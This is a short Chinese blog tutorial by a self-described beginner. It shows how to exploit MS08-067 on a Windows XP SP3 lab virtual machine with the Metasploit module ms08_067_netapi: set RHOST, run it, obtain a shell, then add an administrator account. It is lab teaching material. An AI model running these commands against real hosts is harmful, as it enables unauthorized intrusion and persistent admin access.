本人只是热爱web安全的一名小白，文章只是为了技术提升而分享！大牛勿喷！

本文所使用到的环境工具：

1、win XP SP3 英文版 

下载地址：http://pan.baidu.com/s/1qYjNWBi

解压直接用虚拟机打开就能使用开机密码123456

2、Metasplot (我使用的是基于pentest Box里面集成的MSF)

教程开始：

首先我们先用虚拟机打开靶机查看靶机IP地址

然后确认本机能ping通靶机！

然后打开pentest Box 运行MSF

然后查找我们所需要的漏洞模块，这里我们是针对的MS08-067漏洞所以直接输入search MS08-067

使用此EXP  命令; use exploit/windows/smb/ms08_067_netapi

使用命令show options查看该模块的使用选项

设置攻击目标主机IP地址 set RHOST 192.168.220.129

端口默认445

然后运行run

  成功获取到反弹shell

执行命令shell

看到这个界面就知道了  自己添加个账户提升为管理员登陆就OK了！

好了 教程就到这里  大神勿喷！谢谢！